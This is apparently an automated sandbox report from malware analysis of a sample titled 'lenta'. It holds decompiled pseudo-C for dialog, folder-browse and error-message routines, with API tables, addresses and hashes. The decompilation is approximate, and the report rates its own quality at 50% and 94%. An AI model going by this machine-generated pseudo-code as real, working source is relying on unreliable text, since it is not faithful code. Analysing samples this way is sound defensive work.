                                                                                                                                                                                                                                            						SetEvent( *0xa9858c);
                                                                                                                                                                                                                                            						_t39 =  *0xa9879c; // 0x0
                                                                                                                                                                                                                                            						E00A93680(_t39);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t25 - 1;
                                                                                                                                                                                                                                            					if(_t25 == 1) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetEvent( *0xa9858c);
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t23 == 0xe90) {
                                                                                                                                                                                                                                            					TerminateThread( *0xa9879c, 0);
                                                                                                                                                                                                                                            					EndDialog(_a4, _a12);
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            0x00a934fb
                                                                                                                                                                                                                                            0x00a934fe
                                                                                                                                                                                                                                            0x00a93665
                                                                                                                                                                                                                                            0x00a93666
                                                                                                                                                                                                                                            0x00a93666
                                                                                                                                                                                                                                            0x00a93668
                                                                                                                                                                                                                                            0x00a9366e
                                                                                                                                                                                                                                            0x00a9366e
                                                                                                                                                                                                                                            0x00a93671
                                                                                                                                                                                                                                            0x00a93671
                                                                                                                                                                                                                                            0x00a93677
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93677
                                                                                                                                                                                                                                            0x00a93504
                                                                                                                                                                                                                                            0x00a93506
                                                                                                                                                                                                                                            0x00a93507
                                                                                                                                                                                                                                            0x00a9350c
                                                                                                                                                                                                                                            0x00a9365b
                                                                                                                                                                                                                                            0x00a9365f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93661
                                                                                                                                                                                                                                            0x00a93512
                                                                                                                                                                                                                                            0x00a93515
                                                                                                                                                                                                                                            0x00a935be
                                                                                                                                                                                                                                            0x00a935c1
                                                                                                                                                                                                                                            0x00a935d1
                                                                                                                                                                                                                                            0x00a935d8
                                                                                                                                                                                                                                            0x00a935de
                                                                                                                                                                                                                                            0x00a935f8
                                                                                                                                                                                                                                            0x00a93617
                                                                                                                                                                                                                                            0x00a93617
                                                                                                                                                                                                                                            0x00a93623
                                                                                                                                                                                                                                            0x00a93637
                                                                                                                                                                                                                                            0x00a9363d
                                                                                                                                                                                                                                            0x00a93642
                                                                                                                                                                                                                                            0x00a93644
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93646
                                                                                                                                                                                                                                            0x00a93652
                                                                                                                                                                                                                                            0x00a93657
                                                                                                                                                                                                                                            0x00a93658
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93658
                                                                                                                                                                                                                                            0x00a93644
                                                                                                                                                                                                                                            0x00a9351b
                                                                                                                                                                                                                                            0x00a9351d
                                                                                                                                                                                                                                            0x00a9354f
                                                                                                                                                                                                                                            0x00a93553
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9355f
                                                                                                                                                                                                                                            0x00a93565
                                                                                                                                                                                                                                            0x00a9357c
                                                                                                                                                                                                                                            0x00a93581
                                                                                                                                                                                                                                            0x00a93584
                                                                                                                                                                                                                                            0x00a9359b
                                                                                                                                                                                                                                            0x00a935a1
                                                                                                                                                                                                                                            0x00a935a7
                                                                                                                                                                                                                                            0x00a935ad
                                                                                                                                                                                                                                            0x00a935b3
                                                                                                                                                                                                                                            0x00a935b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a935b8
                                                                                                                                                                                                                                            0x00a93586
                                                                                                                                                                                                                                            0x00a93588
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93590
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93590
                                                                                                                                                                                                                                            0x00a93524
                                                                                                                                                                                                                                            0x00a93535
                                                                                                                                                                                                                                            0x00a93541
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93549
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000), ref: 00A93535
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00A93541
                                                                                                                                                                                                                                            • ResetEvent.KERNEL32 ref: 00A9355F
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00A91140,00000000,00000020,00000004), ref: 00A93590
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A935C7
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 00A935F1
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 00A935F8
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 00A93610
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 00A93617
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,lenta), ref: 00A93623
                                                                                                                                                                                                                                            • CreateThread.KERNEL32 ref: 00A93637
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 00A93671
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                            • String ID: lenta
                                                                                                                                                                                                                                            • API String ID: 2406144884-2780258678
                                                                                                                                                                                                                                            • Opcode ID: 576ffe6a9bba94a7b7dfb416f541538ff01501a741383e874214a20ec1fe5665
                                                                                                                                                                                                                                            • Instruction ID: 8a0ff3adec95617880a87d126902c8af908d12abd783c9cfe4b1de12c7fc76b8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 576ffe6a9bba94a7b7dfb416f541538ff01501a741383e874214a20ec1fe5665
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED318332340301BBDF209FA5AC4DE6B3AF5E79AB41F60461BF702952B0CE758902CA95
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                                                                                            			E00A94224(char __ecx) {
                                                                                                                                                                                                                                            				char* _v8;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                            				char* _v28;
                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                            				char _t42;
                                                                                                                                                                                                                                            				char* _t44;
                                                                                                                                                                                                                                            				char* _t61;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				char* _t65;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                            				char _t67;
                                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                                            				char _t76;
                                                                                                                                                                                                                                            				intOrPtr _t85;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t67 = __ecx;
                                                                                                                                                                                                                                            				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                                                            				if(_t66 == 0) {
                                                                                                                                                                                                                                            					_t63 = 0x4c2;
                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                            					E00A944B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                                                            				_v12 = _t26;
                                                                                                                                                                                                                                            				if(_t26 == 0) {
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					FreeLibrary(_t66);
                                                                                                                                                                                                                                            					_t63 = 0x4c1;
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                                                            				_v20 = _t28;
                                                                                                                                                                                                                                            				if(_t28 == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                                                            				_v16 = _t29;
                                                                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t76 =  *0xa988c0; // 0x0
                                                                                                                                                                                                                                            				if(_t76 != 0) {
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					 *0xa987a0 = 0;
                                                                                                                                                                                                                                            					_v52 = _t67;
                                                                                                                                                                                                                                            					_v48 = 0;
                                                                                                                                                                                                                                            					_v44 = 0;
                                                                                                                                                                                                                                            					_v40 = 0xa98598;
                                                                                                                                                                                                                                            					_v36 = 1;
                                                                                                                                                                                                                                            					_v32 = E00A94200;
                                                                                                                                                                                                                                            					_v28 = 0xa988c0;
                                                                                                                                                                                                                                            					 *0xa9a288( &_v52);
                                                                                                                                                                                                                                            					_t32 =  *_v12();
                                                                                                                                                                                                                                            					if(_t71 != _t71) {
                                                                                                                                                                                                                                            						asm("int 0x29");
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_v12 = _t32;
                                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                                            						 *0xa9a288(_t32, 0xa988c0);
                                                                                                                                                                                                                                            						 *_v16();
                                                                                                                                                                                                                                            						if(_t71 != _t71) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if( *0xa988c0 != 0) {
                                                                                                                                                                                                                                            							E00A91680(0xa987a0, 0x104, 0xa988c0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0xa9a288(_v12);
                                                                                                                                                                                                                                            						 *_v20();
                                                                                                                                                                                                                                            						if(_t71 != _t71) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					FreeLibrary(_t66);
                                                                                                                                                                                                                                            					_t85 =  *0xa987a0; // 0x0
                                                                                                                                                                                                                                            					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					GetTempPathA(0x104, 0xa988c0);
                                                                                                                                                                                                                                            					_t61 = 0xa988c0;
                                                                                                                                                                                                                                            					_t4 =  &(_t61[1]); // 0xa988c1
                                                                                                                                                                                                                                            					_t65 = _t4;
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t42 =  *_t61;
                                                                                                                                                                                                                                            						_t61 =  &(_t61[1]);
                                                                                                                                                                                                                                            					} while (_t42 != 0);
                                                                                                                                                                                                                                            					_t5 = _t61 - _t65 + 0xa988c0; // 0x1531181
                                                                                                                                                                                                                                            					_t44 = CharPrevA(0xa988c0, _t5);
                                                                                                                                                                                                                                            					_v8 = _t44;
                                                                                                                                                                                                                                            					if( *_t44 == 0x5c &&  *(CharPrevA(0xa988c0, _t44)) != 0x3a) {
                                                                                                                                                                                                                                            						 *_v8 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}




























                                                                                                                                                                                                                                            0x00a94234
                                                                                                                                                                                                                                            0x00a9423c
                                                                                                                                                                                                                                            0x00a94240
                                                                                                                                                                                                                                            0x00a943b2
                                                                                                                                                                                                                                            0x00a943b7
                                                                                                                                                                                                                                            0x00a943c0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a943c5
                                                                                                                                                                                                                                            0x00a9424c
                                                                                                                                                                                                                                            0x00a94252
                                                                                                                                                                                                                                            0x00a94257
                                                                                                                                                                                                                                            0x00a943a4
                                                                                                                                                                                                                                            0x00a943a5
                                                                                                                                                                                                                                            0x00a943ab
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a943ab
                                                                                                                                                                                                                                            0x00a94263
                                                                                                                                                                                                                                            0x00a94269
                                                                                                                                                                                                                                            0x00a9426e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9427a
                                                                                                                                                                                                                                            0x00a94280
                                                                                                                                                                                                                                            0x00a94285
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9428d
                                                                                                                                                                                                                                            0x00a94293
                                                                                                                                                                                                                                            0x00a942e6
                                                                                                                                                                                                                                            0x00a942e9
                                                                                                                                                                                                                                            0x00a942ef
                                                                                                                                                                                                                                            0x00a942f4
                                                                                                                                                                                                                                            0x00a942f7
                                                                                                                                                                                                                                            0x00a94300
                                                                                                                                                                                                                                            0x00a94307
                                                                                                                                                                                                                                            0x00a9430e
                                                                                                                                                                                                                                            0x00a94315
                                                                                                                                                                                                                                            0x00a9431c
                                                                                                                                                                                                                                            0x00a94322
                                                                                                                                                                                                                                            0x00a94326
                                                                                                                                                                                                                                            0x00a9432d
                                                                                                                                                                                                                                            0x00a9432d
                                                                                                                                                                                                                                            0x00a9432f
                                                                                                                                                                                                                                            0x00a94334
                                                                                                                                                                                                                                            0x00a94343
                                                                                                                                                                                                                                            0x00a94349
                                                                                                                                                                                                                                            0x00a9434d
                                                                                                                                                                                                                                            0x00a94354
                                                                                                                                                                                                                                            0x00a94354
                                                                                                                                                                                                                                            0x00a9435d
                                                                                                                                                                                                                                            0x00a9436e
                                                                                                                                                                                                                                            0x00a9436e
                                                                                                                                                                                                                                            0x00a9437d
                                                                                                                                                                                                                                            0x00a94383
                                                                                                                                                                                                                                            0x00a94387
                                                                                                                                                                                                                                            0x00a9438e
                                                                                                                                                                                                                                            0x00a9438e
                                                                                                                                                                                                                                            0x00a94387
                                                                                                                                                                                                                                            0x00a94391
                                                                                                                                                                                                                                            0x00a94399
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94295
                                                                                                                                                                                                                                            0x00a9429f
                                                                                                                                                                                                                                            0x00a942a5
                                                                                                                                                                                                                                            0x00a942aa
                                                                                                                                                                                                                                            0x00a942aa
                                                                                                                                                                                                                                            0x00a942ad
                                                                                                                                                                                                                                            0x00a942ad
                                                                                                                                                                                                                                            0x00a942af
                                                                                                                                                                                                                                            0x00a942b0
                                                                                                                                                                                                                                            0x00a942b6
                                                                                                                                                                                                                                            0x00a942c2
                                                                                                                                                                                                                                            0x00a942c8
                                                                                                                                                                                                                                            0x00a942ce
                                                                                                                                                                                                                                            0x00a942e4
                                                                                                                                                                                                                                            0x00a942e4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a942ce

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00A94236
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00A9424C
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00A94263
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00A9427A
                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,00A988C0,?,00000001), ref: 00A9429F
                                                                                                                                                                                                                                            • CharPrevA.USER32(00A988C0,01531181,?,00000001), ref: 00A942C2
                                                                                                                                                                                                                                            • CharPrevA.USER32(00A988C0,00000000,?,00000001), ref: 00A942D6
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A94391
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A943A5
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                            • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                            • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                            • Opcode ID: 795400674b9158c5e41d58c2e756c4c2ec9cf5b1a13d1e2f8fd380a2a28ad202
                                                                                                                                                                                                                                            • Instruction ID: 03cca8148bfa5475ca4234ec23087fe852fffd6db836aff832bb2d9d5c9b65bd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 795400674b9158c5e41d58c2e756c4c2ec9cf5b1a13d1e2f8fd380a2a28ad202
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A41C374B00204AFDF119BB4DC88AAE7BF4EB4A384F54456AE941AB251CF788C0387A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A944B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                                            				char _v576;
                                                                                                                                                                                                                                            				void* _v580;
                                                                                                                                                                                                                                            				struct HWND__* _v584;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t34;
                                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                            				signed int _t52;
                                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                                            				int _t64;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				intOrPtr* _t67;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            				intOrPtr* _t73;
                                                                                                                                                                                                                                            				intOrPtr* _t76;
                                                                                                                                                                                                                                            				intOrPtr* _t77;
                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                                            				void* _t82;
                                                                                                                                                                                                                                            				intOrPtr* _t84;
                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                            				signed int _t89;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t75 = __edx;
                                                                                                                                                                                                                                            				_t34 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                            				_v584 = __ecx;
                                                                                                                                                                                                                                            				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                            				_t67 = _a4;
                                                                                                                                                                                                                                            				_t69 = 0xd;
                                                                                                                                                                                                                                            				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                            				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                            				_v580 = _t37;
                                                                                                                                                                                                                                            				asm("movsb");
                                                                                                                                                                                                                                            				if(( *0xa98a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            					_t39 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_v576 = 0;
                                                                                                                                                                                                                                            					LoadStringA( *0xa99a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                            					if(_v576 != 0) {
                                                                                                                                                                                                                                            						_t73 =  &_v576;
                                                                                                                                                                                                                                            						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                            						_t75 = _t16;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t43 =  *_t73;
                                                                                                                                                                                                                                            							_t73 = _t73 + 1;
                                                                                                                                                                                                                                            						} while (_t43 != 0);
                                                                                                                                                                                                                                            						_t84 = _v580;
                                                                                                                                                                                                                                            						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                            						if(_t84 == 0) {
                                                                                                                                                                                                                                            							if(_t67 == 0) {
                                                                                                                                                                                                                                            								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                            								_t83 = _t27;
                                                                                                                                                                                                                                            								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                            								_t80 = _t44;
                                                                                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t75 = _t83;
                                                                                                                                                                                                                                            									_t74 = _t80;
                                                                                                                                                                                                                                            									E00A91680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t76 = _t67;
                                                                                                                                                                                                                                            								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                            								_t85 = _t24;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t55 =  *_t76;
                                                                                                                                                                                                                                            									_t76 = _t76 + 1;
                                                                                                                                                                                                                                            								} while (_t55 != 0);
                                                                                                                                                                                                                                            								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                            								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                            								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                            								_t80 = _t44;
                                                                                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00A9171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t77 = _t67;
                                                                                                                                                                                                                                            							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                            							_t81 = _t18;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t58 =  *_t77;
                                                                                                                                                                                                                                            								_t77 = _t77 + 1;
                                                                                                                                                                                                                                            							} while (_t58 != 0);
                                                                                                                                                                                                                                            							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                            							_t82 = _t84 + 1;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t59 =  *_t84;
                                                                                                                                                                                                                                            								_t84 = _t84 + 1;
                                                                                                                                                                                                                                            							} while (_t59 != 0);
                                                                                                                                                                                                                                            							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                                                            							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                                                            							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                                                            							_t80 = _t44;
                                                                                                                                                                                                                                            							if(_t80 == 0) {
                                                                                                                                                                                                                                            								goto L6;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_push(_v580);
                                                                                                                                                                                                                                            								E00A9171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                            								L23:
                                                                                                                                                                                                                                            								MessageBeep(_a12);
                                                                                                                                                                                                                                            								if(E00A9681F(_t67) == 0) {
                                                                                                                                                                                                                                            									L25:
                                                                                                                                                                                                                                            									_t49 = 0x10000;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t54 = E00A967C9(_t74, _t74);
                                                                                                                                                                                                                                            									_t49 = 0x190000;
                                                                                                                                                                                                                                            									if(_t54 == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16);
                                                                                                                                                                                                                                            								_t83 = _t52;
                                                                                                                                                                                                                                            								LocalFree(_t80);
                                                                                                                                                                                                                                            								_t39 = _t52;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(E00A9681F(_t67) == 0) {
                                                                                                                                                                                                                                            							L4:
                                                                                                                                                                                                                                            							_t64 = 0x10010;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t66 = E00A967C9(0, 0);
                                                                                                                                                                                                                                            							_t64 = 0x190010;
                                                                                                                                                                                                                                            							if(_t66 == 0) {
                                                                                                                                                                                                                                            								goto L4;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                            						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                                                            			}



































                                                                                                                                                                                                                                            0x00a944b9
                                                                                                                                                                                                                                            0x00a944c4
                                                                                                                                                                                                                                            0x00a944cb
                                                                                                                                                                                                                                            0x00a944d8
                                                                                                                                                                                                                                            0x00a944e4
                                                                                                                                                                                                                                            0x00a944eb
                                                                                                                                                                                                                                            0x00a944ee
                                                                                                                                                                                                                                            0x00a944ef
                                                                                                                                                                                                                                            0x00a944ef
                                                                                                                                                                                                                                            0x00a944f1
                                                                                                                                                                                                                                            0x00a944f7
                                                                                                                                                                                                                                            0x00a944f8
                                                                                                                                                                                                                                            0x00a9467b
                                                                                                                                                                                                                                            0x00a944fe
                                                                                                                                                                                                                                            0x00a94509
                                                                                                                                                                                                                                            0x00a94518
                                                                                                                                                                                                                                            0x00a94525
                                                                                                                                                                                                                                            0x00a94562
                                                                                                                                                                                                                                            0x00a94568
                                                                                                                                                                                                                                            0x00a94568
                                                                                                                                                                                                                                            0x00a9456b
                                                                                                                                                                                                                                            0x00a9456b
                                                                                                                                                                                                                                            0x00a9456d
                                                                                                                                                                                                                                            0x00a9456e
                                                                                                                                                                                                                                            0x00a94572
                                                                                                                                                                                                                                            0x00a94578
                                                                                                                                                                                                                                            0x00a9457c
                                                                                                                                                                                                                                            0x00a945cb
                                                                                                                                                                                                                                            0x00a94607
                                                                                                                                                                                                                                            0x00a94607
                                                                                                                                                                                                                                            0x00a9460d
                                                                                                                                                                                                                                            0x00a94613
                                                                                                                                                                                                                                            0x00a94617
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9461d
                                                                                                                                                                                                                                            0x00a94623
                                                                                                                                                                                                                                            0x00a94626
                                                                                                                                                                                                                                            0x00a94628
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a94628
